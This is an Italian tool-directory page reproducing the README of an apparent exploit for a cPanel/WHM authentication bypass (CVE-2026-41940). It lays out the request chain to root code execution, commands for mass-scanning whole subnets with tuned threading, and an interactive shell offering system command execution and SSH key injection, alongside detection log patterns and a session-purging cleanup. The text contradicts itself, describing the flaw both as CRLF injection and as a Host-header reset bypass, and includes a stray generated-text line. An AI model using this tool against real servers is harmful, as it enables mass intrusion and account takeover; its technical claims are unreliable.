Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41940 — CVE-2026-41940 — Bypass dell'autenticazione cPanel/WHM di Dr.Anach, iniezione CRLF nell'handler di autenticazione Basic di `cpsrvd` → accesso non autenticato all'API WHM → RCE come root. Tutte le versioni di cPanel dalla v11.40 sono interessate. | Kitploit
Strumenti/GitHubGitHub/anach-ai/cve-2026-41940
Autenticazione e AutorizzazioneEscalation di PrivilegiAnalisi delle VulnerabilitàExploitMovimento LateraleSfruttamento di Applicazioni WebPost-ExploitPenetration TestingCommand and ControlRed Teaming
GitHub
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
anach-ai/cve-2026-41940

CVE-2026-41940

CVE-2026-41940 — Bypass dell'autenticazione cPanel/WHM di Dr.Anach, iniezione CRLF nell'handler di autenticazione Basic di `cpsrvd` → accesso non autenticato all'API WHM → RCE come root. Tutte le versioni di cPanel dalla v11.40 sono interessate.

Vedi Repository

CVE-2026-41940 — Bypass autenticazione cPanel/WHM

Autore: Dr.Anach | Contatto: @dranach | Licenza: MIT


Panoramica

Iniezione CRLF nel gestore di autenticazione Basic di cpsrvd → accesso non autenticato alle API WHM → RCE come root. Tutte le versioni di cPanel dalla v11.40 sono interessate.

Catena di attacco

#PassoRichiesta
1Genera sessioneGET /login/?user=root
2Iniezione CRLFAuthorization: Basic <base64> — la password trasporta il payload \r\n
3Promozione cacheGET /cpsess<ID>/login/?login_only=1
4EseguiGET /cpsess<ID>/execute/API/func

Installazione

root@kitploit:~
pip install requests colorama

Di seguito il README.md finale — chiaro, pratico e pensato per portare a termine il lavoro.


Exploit Bypass Autenticazione cPanel — CVE-2026-41940

Autore: Dr.Anach · Telegram: @dranach
Versione: 2.0.0
Licenza: Solo per test di sicurezza autorizzati


Cosa fa

Sfrutta CVE-2026-41940, un bypass dell'autenticazione in cPanel & WHM (versioni dalla 11.x alla 106.x). La vulnerabilità consente a un attaccante non autenticato di accedere a endpoint ristretti — inclusa la funzione di reset della password — inviando un header Host appositamente modificato che punta a un server controllato dall'attaccante.

Include tre modalità:

ModalitàFlagDescrizione
Singolo target-t

Installazione

Requisiti

  • Python 3.7+ (testato su Windows, Linux, macOS)
  • libreria requests
root@kitploit:~
pip install requests

Nessuna altra dipendenza. L'espansione CIDR usa il modulo ipaddress integrato di Python — nessun extra da installare su Windows.


Avvio rapido

Test di un singolo target

root@kitploit:~
python main.py -t example.com
python main.py -t 192.168.1.100

Test di una lista di target (uno per riga)

root@kitploit:~
python main.py --batch targets.txt --threads 50

Formato di targets.txt:

root@kitploit:~
192.168.1.100
example.com
192.168.1.101
example.org
192.168.1.102

Scansione di un'intera sottorete (CIDR)

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 --threads 100 --timeout 5

Questo espande 192.168.128.0/18 (16.384 IP), esegue un rapido controllo delle porte su ciascuno e tenta lo sfruttamento solo sugli host in cui la porta 2087 (cPanel/WHM) è aperta.


Opzioni complete

root@kitploit:~
  -t, --target        Single target IP or domain
  --batch FILE        File with targets (one per line)
  --port-scan CIDR    CIDR range to scan (e.g., 192.168.128.0/18)
  -p, --port          Target port (default: 2087)
  --ssl               Use HTTPS (default: HTTP)
  --timeout SEC       Connection timeout in seconds (default: 10)
  --threads N         Max concurrent threads (default: 50)
  --proxy PROXY       HTTP proxy (e.g., http://127.0.0.1:8080)
  -v, --verbose       Verbose output with debug info
  --no-banner         Suppress banner
  --version           Show version

Interpretazione dell'output

root@kitploit:~
[+] 192.168.130.45:2087 — VULNERABLE!
    → Password reset URL: http://192.168.130.45:2087/reset?token=abc123
    → Response time: 1.23s

[-] 192.168.131.10:2087 — Not vulnerable
    → Reason: No password reset endpoint found

[!] 192.168.129.22:2087 — Error: Connection refused

I risultati salvati in JSON sono strutturati per host e includono lo stato di vulnerabilità, i token estratti e i dettagli grezzi della risposta.


Esempio pratico: scansione di una /18 su Windows

Lo scenario per cui probabilmente sei qui:

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 -p 2087 --threads 100 --timeout 5 -v

Come funziona:

  1. Espande 192.168.128.0/18 → 16.384 IP internamente
  2. Pre-filtra con una rapida scansione di connessione TCP sulla porta 2087 (salta gli host non raggiungibili)
  3. Sfrutta solo gli host con una porta aperta
  4. Segnala gli host vulnerabili con i token di reset estratti

Suggerimenti sul multithreading:

  • --threads 100 funziona bene (rispetta i limiti predefiniti dei socket)
  • Per scansioni più veloci su buone connessioni: --threads 200
  • Se incappi nel rate limiting: abbassa a --threads 30 e aumenta --timeout

CVSS e Rischio

CVSS 9.1 (Critico) — Nessuna autenticazione richiesta, nessuna interazione dell'utente, bassa complessità.

Impatto

  • Reset non autorizzato della password per qualsiasi account cPanel
  • Presa di controllo completa dell'account
  • Escalation dei privilegi da utente limitato ad admin in alcune configurazioni

Rimedio

  • Aggiorna cPanel/WHM all'ultima versione patchata
  • Valida gli header Host lato server
  • Limita l'accesso a WHM per IP dove possibile

Note legali

Questo strumento è esclusivamente per valutazioni di sicurezza autorizzate. Devi possedere i target o avere il permesso scritto del proprietario prima di testarli. Gli autori non si assumono alcuna responsabilità per un uso improprio.

Comandi della shell interattiva

root@kitploit:~
help       Show commands
info       Server info
passwd     Change password
accounts   List cPanel accounts
enum       Full enumeration
shell      Execute system command
ssh-add    Inject SSH key
exec       Run Python one-liner
exit       Exit

Rilevamento

Controlla i file di sessione:

root@kitploit:~
ls -la /var/cpanel/sessions/raw/
ls -la /var/cpanel/sessions/cache/

Log sospetti in /usr/local/cpanel/logs/access_log:

root@kitploit:~
/login/?user=root        → session mint
/login/?user=root        → CRLF injection
/cpsess*/login/?login_only=1  → cache promotion
/cpsess*/execute/*       → API abuse

Mitigazione

root@kitploit:~
# 1. Patch to fixed build
# 2. Rotate all passwords and SSH keys
# 3. Purge sessions
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

Crediti

  • Vulnerabilità: Sina Kheirkhah / watchTowr Labs
  • Framework: Dr.Anach (@dranach)
Scarica lo strumento
Testa un singolo IP o dominio
File batch--batchCarica una lista di target da un file
Scansione CIDR--port-scanEspande una sottorete e testa ogni host attivo